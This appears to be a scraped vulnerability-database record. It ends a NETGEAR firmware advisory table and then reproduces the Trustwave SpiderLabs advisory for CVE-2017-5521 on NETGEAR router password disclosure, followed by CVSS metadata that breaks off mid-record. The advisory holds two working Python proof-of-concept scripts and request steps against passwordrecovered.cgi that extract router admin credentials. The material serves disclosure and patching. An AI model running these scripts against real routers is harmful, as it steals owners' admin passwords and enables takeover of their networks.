href=\"https://www.netgear.com/support/product/r7000p/\"\u003eV1.3.3.152\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7960P (EoS)\u003c/b\u003e Nighthawk X6S AC3600 Tri-Band WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7960p/\"\u003eV1.4.4.92\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR8000P (EoS)\u003c/b\u003e Nighthawk X6S AC4000 Tri Band WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r8000p/\"\u003eV1.4.4.92\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR8500 (EoS)\u003c/b\u003e Nighthawk X8 AC5300 Smart WiFi Router\u003c/td\u003e\u003ctd\u003eEOS\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX20 (EoS)\u003c/b\u003e 4-Stream AX1800 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax20/\"\u003eV1.0.18.144\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX35v2\u003c/b\u003e Nighthawk AX4 4-Stream AX3000 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax35v2/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX40v2\u003c/b\u003e Nighthawk AX4 4-Stream WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax40v2/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX41 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX3600 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax41/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX42 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX4200 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax42/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX43 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX4200 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax43/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX45 (EoS)\u003c/b\u003e Nighthawk AX6 6-Stream AX4300 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax45/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX48\u003c/b\u003e Nighthawk AX6 6-Stream AX5200 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax48/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX50\u003c/b\u003e Nighthawk AX6 6-Stream AX5400 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax50/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX50S\u003c/b\u003e Nighthawk AX6 6-Stream AX5400 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax50s/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAXE450\u003c/b\u003e Nighthawk AXE10000 Tri-Band WiFi 6E Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/raxe450/\"\u003eV1.0.10.86\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAXE500\u003c/b\u003e Nighthawk AX12 12-Stream AXE11000 Tri-Band WiFi 6E Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/raxe500/\"\u003eV1.0.10.86\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eXR1000\u003c/b\u003e Nighthawk WiFi 6 Pro Gaming Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/xr1000/\"\u003eV1.0.0.68\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003eModels marked (EoS) have reached End-of-Support phase, and no security updates are planned. NETGEAR strongly recommends that you retire these devices and upgrade to a newer NETGEAR device for continued security support.\u003c/p\u003e"
}
],
"value": "Devices with automatic updates enabled may already have this patch applied. If not, please check the firmware version and update it to the latest. Fixed in:\n\nProductFixed VersionEX3700 AC750 WiFi Range Extender Essentials Edition V1.0.0.100 https://www.netgear.com/support/product/ex3700/ EX3800 (EoS) AC750 WiFi Range Extender Essentials Edition V1.0.0.100 https://www.netgear.com/support/product/ex3800/ EX6120 AC1200 Dual Band WiFi Range Extender V1.0.0.72 https://www.netgear.com/support/product/ex6120/ EX6130 AC1200 WiFi Range Extender V1.0.0.54 https://www.netgear.com/support/product/ex6130/ MR60 Nighthawk Mesh WiFi 6 Router V1.1.7.132 https://www.netgear.com/support/product/mr60/ MR70 Nighthawk Mesh WiFi 6 Router V1.0.3.28 https://www.netgear.com/support/product/mr70/ MR80 Nighthawk Tri-band Mesh WiFi 6 Router V1.1.7.14 https://www.netgear.com/support/product/mr80/ MS60 Nighthawk Mesh WiFi 6 Add-on Satellite V1.1.7.132 https://www.netgear.com/support/product/ms60/ MS70 Nighthawk Mesh WiFi 6 Add-on Satellite V1.0.3.28 https://www.netgear.com/support/product/ms70/ MS80 Nighthawk Tri-band Mesh WiFi 6 Add-on Satellite V1.1.7.14 https://www.netgear.com/support/product/ms80/ R6400v2 (EoS) AC1750 Smart WiFi Router 802.11ac Dual Band Gigabit V1.0.4.128 https://www.netgear.com/support/product/r6400v2/ R6700v3 (EoS) Nighthawk AC1750 Smart WiFi Dual Band Gigabit Router V1.0.4.128 https://www.netgear.com/support/product/r6700v3/ R6900P (EoS) Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router V1.3.3.152 https://www.netgear.com/support/product/r6900p/ R7000 (EoS) Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router V1.0.11.216 https://www.netgear.com/support/product/r7000/ R7000P (EoS) Nighthawk AC2300 Smart WiFi Dual Band Gigabit Router V1.3.3.152 https://www.netgear.com/support/product/r7000p/ R7960P (EoS) Nighthawk X6S AC3600 Tri-Band WiFi Router V1.4.4.92 https://www.netgear.com/support/product/r7960p/ R8000P (EoS) Nighthawk X6S AC4000 Tri Band WiFi Router V1.4.4.92 https://www.netgear.com/support/product/r8000p/ R8500 (EoS) Nighthawk X8 AC5300 Smart WiFi RouterEOSRAX20 (EoS) 4-Stream AX1800 WiFi 6 Router V1.0.18.144 https://www.netgear.com/support/product/rax20/ RAX35v2 Nighthawk AX4 4-Stream AX3000 WiFi 6 Router V1.0.12.118 https://www.netgear.com/support/product/rax35v2/ RAX40v2 Nighthawk AX4 4-Stream WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax40v2/ RAX41 (EoS) Nighthawk AX5 5-Stream AX3600 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax41/ RAX42 (EoS) Nighthawk AX5 5-Stream AX4200 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax42/ RAX43 (EoS) Nighthawk AX5 5-Stream AX4200 WiFi Router V1.0.12.120 https://www.netgear.com/support/product/rax43/ RAX45 (EoS) Nighthawk AX6 6-Stream AX4300 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax45/ RAX48 Nighthawk AX6 6-Stream AX5200 WiFi 6 Router V1.0.12.118 https://www.netgear.com/support/product/rax48/ RAX50 Nighthawk AX6 6-Stream AX5400 WiFi 6 Router V1.0.12.120 https://www.netgear.com/support/product/rax50/ RAX50S Nighthawk AX6 6-Stream AX5400 WiFi 6 Router V1.0.12.120 https://www.netgear.com/support/product/rax50s/ RAXE450 Nighthawk AXE10000 Tri-Band WiFi 6E Router V1.0.10.86 https://www.netgear.com/support/product/raxe450/ RAXE500 Nighthawk AX12 12-Stream AXE11000 Tri-Band WiFi 6E Router V1.0.10.86 https://www.netgear.com/support/product/raxe500/ XR1000 Nighthawk WiFi 6 Pro Gaming Router V1.0.0.68 https://www.netgear.com/support/product/xr1000/ \n\nModels marked (EoS) have reached End-of-Support phase, and no security updates are planned. NETGEAR strongly recommends that you retire these devices and upgrade to a newer NETGEAR device for continued security support."
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Certain NETGEAR routers allow authenticated administrators to gain unintended control of the router",
"x_generator": {
"engine": "Vulnogram 1.0.3"
}
}
},
"cveMetadata": {
"assignerOrgId": "a2826606-91e7-4eb6-899e-8484bd4575d5",
"assignerShortName": "NETGEAR",
"cveId": "CVE-2026-9210",
"datePublished": "2026-06-09T15:50:48.947Z",
"dateReserved": "2026-05-21T17:29:00.866Z",
"dateUpdated": "2026-06-11T05:38:03.646Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
VAR-201701-0766
Vulnerability from variot - Updated: 2025-11-18 15:06An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions. NETGEARR8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 and R8000 are Netgear's wireless router products. There are information disclosure vulnerabilities in several NETGEAR products. Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers
Published: 01/30/2017 Version: 1.0
Vendor: NETGEAR (http://www.netgear.com/) Product: Multiple products
Finding 1: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521
Version affected:
AC1450 V1.0.0.34_10.0.16 (Latest)
AC1450 V1.0.0.22_1.0.10
AC1450 V1.0.0.14_1.0.6
D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
D6400 V1.0.0.34_1.3.34
D6400 V1.0.0.38_1.1.38
D6400 V1.0.0.22_1.0.22
DC112A V1.0.0.30_1.0.60 (Latest)
DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
JNDR3000 V1.0.0.18_1.0.16 (Latest)
R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
R6300 V1.0.2.78_1.0.58 (Latest)
R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
R6300v2 V1.0.3.30_10.0.73
R6700 V1.0.1.14_10.0.29 (Latest beta)
R6700 V1.0.0.26_10.0.26 (Latest stable)
R6700 V1.0.0.24_10.0.18
R6900 V1.0.0.4_1.0.10 (Latest)
R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
R8300 V1.0.2.48_1.0.52
R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
R8500 V1.0.2.26_1.0.41
R8500 V1.0.0.56_1.0.28
R8500 V1.0.0.20_1.0.11
VEGN2610 V1.0.0.35_1.0.35 (Latest)
VEGN2610 V1.0.0.29_1.0.29
VEGN2610 V1.0.0.27_1.0.27
WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
WNDR4000 V1.0.2.4_9.1.86 (Latest)
WNDR4500 V1.0.1.40_1.0.68 (Latest)
WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
WNDR4500v2 V1.0.0.42_1.0.25
WGR614v10 V1.0.2.60_60.0.85NA (Latest)
WGR614v10 V1.0.2.58_60.0.84NA
WGR614v10 V1.0.2.54_60.0.82NA
WN3100RP V1.0.0.14_1.0.19 (Latest)
WN3100RP V1.0.0.6_1.0.12
Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
Lenovo R3220 V1.0.0.13_1.0.13
Product description: Multiple Netgear Routers
Many Netgear routers are prone to password disclosure via simple crafted requests to the web management server. This can easily be reproduced using the attached poc, or by sending these two simple requests via the browser: 1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token 2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)
netgore.py
import sys import requests
def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english"
disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
1st stage - get token
ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0) token = scrape(r.text, 'unauth.cgi?id=', '\"') if token == 'i_dont_speak_english': print "not vulnerable" sys.exit(0) print "token found: " + token
2nd stage - pass the token - get the password
url = url + 'passwordrecovered.cgi?id=' + token r = requests.post(url, verify=False)
profit
if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username', ''))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password', ''))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) else: print "not vulnerable becuse password recovery IS set" sys.exit(0)
html encoding pops out of nowhere, lets replace that
password = password.replace("#","#") password = password.replace("&","&") print "user: " + username print "pass: " + password
================================ Just run the PoC against a router to get the credentials if it is vulnerable.
Finding 2: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521
Version affected:
AC1450 V1.0.0.34_10.0.16 (Latest)
AC1450 V1.0.0.22_1.0.10
AC1450 V1.0.0.14_1.0.6
D6300 V1.0.0.96_1.1.96 (Latest)
D6300B V1.0.0.36_1.0.36
D6300B V1.0.0.32_1.0.32
D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
D6400 V1.0.0.22_1.0.22
DC112A V1.0.0.30_1.0.60 (Latest)
DGN2200v4 V1.0.0.76_1.0.76 (Latest)
DGN2200v4 V1.0.0.66_1.0.66
DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
JNDR3000 V1.0.0.18_1.0.16 (Latest)
R6200 V1.0.1.56_1.0.43 (Latest)
R6200 V1.0.1.52_1.0.41
R6200 V1.0.1.48_1.0.37
R6200v2 V1.0.3.10_10.1.10 (Latest)
R6200v2 V1.0.1.20_1.0.18
R6250 V1.0.4.6_10.1.12 (Latest beta)
R6250 V1.0.4.2_10.1.10 (Latest stable)
R6250 V1.0.1.84_1.0.78
R6300 V1.0.2.78_1.0.58 (Latest)
R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
R6700 V1.0.0.26_10.0.26 (Latest)
R6700 V1.0.0.24_10.0.18
R6900 V1.0.0.4_1.0.10 (Latest)
R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
R7000 V1.0.4.30_1.1.67
R7900 V1.0.1.8_10.0.14 (Latest beta)
R7900 V1.0.1.4_10.0.12 (Latest stable)
R7900 V1.0.0.10_10.0.7
R7900 V1.0.0.8_10.0.5
R7900 V1.0.0.6_10.0.4
R8000 V1.0.3.26_1.1.18 (Latest beta)
R8000 V1.0.3.4_1.1.2 (Latest stable)
R8300 V1.0.2.48_1.0.52
R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
R8500 V1.0.2.30_1.0.43
VEGN2610 V1.0.0.35_1.0.35 (Latest)
VEGN2610 V1.0.0.27_1.0.27
VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
VEVG2660 V1.0.0.23_1.0.23
WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
WNDR3400v3 V1.0.1.2_1.0.51
WNDR3400v3 V1.0.0.22_1.0.29
WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
WNDR4000 V1.0.2.4_9.1.86 (Latest)
WNDR4500 V1.0.1.40_1.0.68 (Latest)
WNDR4500 V1.0.1.6_1.0.24
WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
WNDR4500v2 V1.0.0.50_1.0.30
WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
WNR1000v3 V1.0.2.62_60.0.87 (Latest)
WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
WNR3500Lv2 V1.2.0.32_40.0.74
WGR614v10 V1.0.2.60_60.0.85NA (Latest)
WGR614v10 V1.0.2.58_60.0.84NA
WGR614v10 V1.0.2.54_60.0.82NA
Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
Lenovo R3220 V1.0.0.13_1.0.13
Many Netgear routers are prone to password disclosure via simple crafted request to the web management server.
This mechanism does not work correctly on the very first request to "passwordrecovered.cgi" and the token is not properly checked, this means that any TOKEN value will result in disclosure of the password. The issue occurs after every reboot of the router.
This can easily be reproduced using the attached poc, or by sending a simple request via the browser: 1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)
netgore2.py
import sys import requests
def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english"
disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
1st stage
ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0)
2nd stage
url = url + 'passwordrecovered.cgi?id=get_rekt' try: r = requests.post(url, verify=False) except: print "not vulnerable router" sys.exit(0)
profit
if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username', ''))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password', ''))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) else: print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again" sys.exit(0)
html encoding pops out of nowhere, lets replace that
password = password.replace("#","#") password = password.replace("&","&") print "user: " + username print "pass: " + password
================================ Just run the PoC against a router to get the credentials if it is vulnerable.
Remediation Steps: Please see NETGEAR's KBA for list of firmware patches for various models.
Revision History: 04/06/2016 - Vulnerability disclosed to vendor 04/19/2016 - Request for update and received confirmation of receipt of the advisories 05/18/2016 - Request for update; no response 07/14/2016 - Request for update 07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage 10/17/2016 - Request for update 12/15/2016 - Notice of intent to publish advisories 01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd 01/30/2017 - Advisory published
References 1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html 2. https://www.exploit-db.com/exploits/32883/ 3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "d6220",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.12"
},
{
"_id": null,
"model": "d6300",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.96"
},
{
"_id": null,
"model": "d6400",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.44"
},
{
"_id": null,
"model": "wndr3700v3",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40_1.0.32"
},
{
"_id": null,
"model": "wndr4000",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.4_9.1.86"
},
{
"_id": null,
"model": "d6300b",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"_id": null,
"model": "wndr4500",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.44_1.0.73"
},
{
"_id": null,
"model": "dgn2200bv4",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"_id": null,
"model": "ac1450",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.34_10.0.16"
},
{
"_id": null,
"model": "wnr1000v3",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.68_60.0.93"
},
{
"_id": null,
"model": "wndr3700v3",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6400",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "wnr1000v3",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "r6300",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6220",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "wndr4500",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6300b",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "r6200",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "ac1450",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "wndr4000",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "d6300",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "dgn2200bv4",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "vegn2610",
"scope": null,
"trust": 1.6,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"_id": null,
"model": "r6300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.78_1.0.58"
},
{
"_id": null,
"model": "r6200",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.56_1.0.43"
},
{
"_id": null,
"model": "vegn2610",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"_id": null,
"model": "r8500",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r7000",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r8300",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6400",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r7300",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r7100lg",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6300v2",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "wndr3400v3",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "wnr3500lv2",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6250",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6700",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r8000",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
},
{
"_id": null,
"model": "r6900",
"scope": "eq",
"trust": 0.9,
"vendor": "netgear",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-00835"
},
{
"db": "BID",
"id": "95457"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-454"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001263"
},
{
"db": "NVD",
"id": "CVE-2017-5521"
}
]
},
"credits": {
"_id": null,
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "95457"
}
],
"trust": 0.3
},
"cve": "CVE-2017-5521",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-5521",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-00835",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-113724",
